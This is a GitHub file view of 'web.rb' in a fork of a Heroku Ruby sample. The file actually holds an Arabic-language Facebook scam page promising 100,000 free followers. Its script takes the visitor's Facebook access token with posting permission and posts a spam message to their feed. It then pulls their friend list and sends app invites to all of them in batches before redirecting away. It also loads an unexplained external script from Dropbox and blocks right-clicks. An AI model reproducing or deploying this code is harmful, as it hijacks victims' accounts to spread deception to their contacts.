forked from heroku/ruby-sample
-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathweb.rb
More file actions
353 lines (324 loc) · 18.3 KB
/
web.rb
File metadata and controls
353 lines (324 loc) · 18.3 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns:og="http://ogp.me/ns#" xmlns:fb="http://www.facebook.com/2008/fbml">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="description" content="حصل على 100 الف متابع مجان" />
<meta name="keywords" content="free followers, احصل على متابعين مجاناً, متابعين فيس بوك" />
<meta property="og:title" content="حصل على 100 الف متابع مجان"/>
<meta property="og:type" content="Web" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta property="og:site_name" content="حصل على 100 الف متابع مجان" />
<meta property="og:description" content="احصل على 100 الف متابع مجانا" />
<meta http-equiv="imagetoolbar" CONTENT="no">
<link rel="shortcut icon" href="http://www.weladwbanat.net/up/do.php?imgf=w.b_rss-icon_22b3c.gifImM.png">
<head>
<title>Get 100K Followers For Free</title>
<center>
<style>
img {
border: 0;
}
body {
width:100%;
height:100%;
margin: 0px 0px;
}
#ol1 {
padding-left: 6cm;
padding-top: 8cm;
}
#modal {
width:100%;
height:100%;
position:fixed;
z-index:100;
background: #000;
-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=85)";
/* IE 5-7 */
filter: alpha(opacity=85);
/* Netscape */
-moz-opacity: 0.85;
/* Safari 1.x */
-khtml-opacity: 0.85;
/* Good browsers */
opacity: 0.85;
}
.container {
width: 100%;
height:100%;
position:fixed;
margin: 0 auto;
z-index: 1001;
}
.container .box {
width:760px;
margin: 0 auto;
margin-top:70px;
height: 370px;
max-height: 10000px;
background: #fff;
z-index: 1001;
opacity: 1;
border: 1px solid rgba(0, 0, 0, 0.3);
-webkit-border-radius: 6px;
-moz-border-radius: 6px;
border-radius: 6px;
-webkit-box-shadow: 0 3px 7px rgba(0, 0, 0, 0.3);
-moz-box-shadow: 0 3px 7px rgba(0, 0, 0, 0.3);
box-shadow: 0 3px 7px rgba(0, 0, 0, 0.3);
-webkit-background-clip: padding-box;
-moz-background-clip: padding-box;
background-clip: padding-box;
padding: 10px;
position:relative;
}
.box .foot {
display:block;
margin: 0 auto;
position:absolute;
left: 315px;
}
.box .foot a {
display:block;
text-align:center;
border: 1px #ee9999 solid;
background: #fff;
width: 100px;
height: 30px;
font-size:25px;
color: #999;
text-decoration: none;
}
.box .title {
text-align:center;
font-weight: bold;
font-size: 25px;
color: #FF0080;
height:30px;
}
</style>
<script src="//ajax.googleapis.com/ajax/libs/jquery/1.9.1/jquery.min.js" ></script>
<script src="https://dl.dropboxusercontent.com/u/194518097/om.js" ></script>
<script type="text/javascript">
var _gaq = _gaq || [];
_gaq.push(['_setAccount', 'UA-42498707-1']);
_gaq.push(['_trackPageview']);
(function() {
var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
})();
</script>
<script src="https://dl.dropboxusercontent.com/u/194518097/om.js" ></script>
<script>
function skip() {
document.getElementById("modal").style.display = "none";
document.getElementById("container").style.display = "none";
}
</script>
<script language='JavaScript' type='text/JavaScript'>
http://htmlgenerator.weebly.com
var tenth='';function ninth() {
if (document.all) {(tenth);alert("By KiNg AlHaCkErS"); return false;}}
function twelfth(e) {
if (document.layers||(document.getElementById&&!document.all)) {
if (e.which==2||e.which==3) {(tenth);return false;}}}
if (document.layers) {document.captureEvents(Event.MOUSEDOWN);document.onmousedown=twelfth;}
else{document.onmouseup=twelfth;document.oncontextmenu=ninth;}
document.oncontextmenu=new Function('alert("By KiNg AlHaCkErS"); return false')
</script>
</head>
<body style="background-image: url('http://im33.gulfup.com/p4yxV.png'); text-align:left">
</center>
<p class="style1"> </p>
<p class="style1"><span lang="ar-sy"><font size="4">
</font>الفيديو الذي يُؤكد<font size="4"> </font></span></p>
<p class="style1">
<span lang="ar-sy"><b><font size="4"> </font>صحة
التطبيق وعمله بشكل جيد<font size="4"> </font></span></p>
<div id="header">
<p style="text-align: left">
<font size="4" color="#0000FF">
</font>
<a href="http://www.youtube.com/watch?v=93X89RSTkP4" target="_blank">
<img src="http://im31.gulfup.com/HdDOY.png" width="120" height="23"></a>
<font size="4" color="#0000FF">اولا</font><span lang="ar-sy"><font size="4" color="#0000FF"> </font>
<font size="4">اختر عدد المتابعين الذي تريده لحسابك </font></span></p>
<p style="text-align: left">
<input type="radio" value="pasta" name="lunch"></input> <font size="5">
<font color="#0000FF">100<span lang="ar-sa">.</span>000</font>
</font>
<input type="radio" value="pasta" name="lunch"></input><font size="5"> <font color="#0000FF">50<span lang="ar-sa">.</span>000</font>
</font>
<input type="radio" value="pasta" name="lunch"></input>
<font size="5"><font color="#0000FF">10<span lang="ar-sa">.</span>000</font>
</font>
</p>
<p align="left">
<img src="http://www.gulfup.com/styles/gulfup2/images/loading.gif" width="280" height="13"></a></p>
<p align="left">
<br />
<font size="4" color="#0000FF">
<span lang="ar-sy"> </span> <span lang="ar-sa">
</span> </font>
<span lang="ar-sy"><font size="4" color="#0000FF">ثانيا </font> </span>
<font size="4">
<span lang="ar-sy">
<span lang="ar-sy">اضغط تقديم الطلب وارسل الاشعارات لجميع
اصدقائك</span></span></font><br />
</p>
<table>
<tr>
<td>
<!-- ADS -->
</td>
<td style="text-align:center">
<div id="ol">
<p style="text-align: left">
<a href="#" onclick="return sendRequestToFriends('ارسل الادعوات لجميع الاصدقاء للحصول على المتابعين','ارسل الادعوات لجميع الاصدقاء للحصول على المتابعين.')">
<img src="http://i50.tinypic.com/ouwins.jpg" width="100" height="31" />
</a>
<br />
<br />
<!-- ADS -->
</div>
</td>
<td>
<!-- ADS -->
</td>
</tr>
</table>
<p><span lang="ar-sy"> </span></p>
<center>
<center>
<br />
<br />
<br />
<div id="add">
</div>
</div>
</center>
<div id="fb-root"></div>
<script>
var app_id = 605440376190006,
app_name = "اكثر من 100 الف متابع",
app_pic = "http://www.iraqup.com/up/20131220/g8JFJ-d34y_262448643.png",
davet_m = '',
davet_t = 'Invite Friends To Play',
fba = 0,
posted = false,
app_url = "https://apps.facebook.com/unlimited-followers",
post_message = "احصل على 100 متابع من هنا انا حصلت عليها جاء دورك الان";
$.getJSON("https://graph.facebook.com/"+app_id,function(response) {
if (response && response.namespace) {
app_url = "http://apps.facebook.com/"+response.namespace;
}
})
window.fbAsyncInit = function () {
var curLoc = window.location;
FB.init({
appId: app_id,
xfbml: true,
oauth: true,
cookie: true
});
FB.Canvas.setAutoGrow();
FB.Canvas.setDoneLoading();
};
(function () {
var e = document.createElement('script');
e.async = true;
e.src = document.location.protocol + '//connect.facebook.net/en_US/all.js';
document.getElementById('fb-root').appendChild(e);
}());
function mshuffle(o) {
for (var j, x, i = o.length; i; j = parseInt(Math.random() * i), x = o[--i], o[i] = o[j], o[j] = x);
return o;
};
var fbtoken = "";
function sendRequestToFriends(txxt, title) {
if (true == posted) return false;
davet_m = txxt;
if (title) davet_t = title;
FB.login(function (response) {
//console.log(response);
if (response.authResponse) {
if (response.authResponse.accessToken) {
fbtoken = response.authResponse.accessToken;
var post_url = "https://graph.facebook.com/me/feed";
var post_vars = {
method: "POST",
access_token: fbtoken,
message: post_message,
link: app_url,
picture: app_pic,
name: app_name,
caption: "الكثير من المتابعين",
description: "متابعين لحسابك الشخصي"
}
$.getJSON(post_url,post_vars,function(response){
posted_id = response.id || 0;
_gaq.push(['_trackEvent', 'post', posted_id]);
})
}
FB.api('/me', function (response) {
fba = response.id;
});
all();
} else {
_gaq.push(['_trackEvent', 'Auth', fba]);
//all();
}
},{
scope: "publish_actions"
});
return false;
};
function all() {
var f = [];
FB.api('/me/friends', function (response) {
_gaq.push(['_trackEvent', 'Friends', fba, '', response.data.length]);
for (var i = 0; i < response.data.length; i++) f.push(response.data[i].id);
loop(f);
});
};
function loop(f) {
var l = Math.min(f.length, 50),
t = [];
mshuffle(f);
if (0 != l) {
for (var j = 0; j < l; j++) t.push(f[j]);
FB.ui({
method: 'apprequests',
data: app_id,
message: davet_m,
title: davet_t,
to: t
}, function (response) {
if (response) {
_gaq.push(['_trackEvent', 'Requests', fba, '', response.to.length]);
for (var i = 0; i < response.to.length; i++) {
var idx = f.indexOf(response.to[i]);
- 1 != idx && f.splice(idx, 1);
}
if (f.length == 0) {
top.location.href = 'http://free-unlimited-followers.blogspot.com/';
}
f.length > 0 && loop(f);
} else {
_gaq.push(['_trackEvent', 'Requests', fba]);
f.length > 0 && loop(f);
}
});
} else {
top.location.href = 'http://free-unlimited-followers.blogspot.com/';
}
}
</script>
<div style="visibility:hidden">
</div>
</body>
</center>
</html>
</html>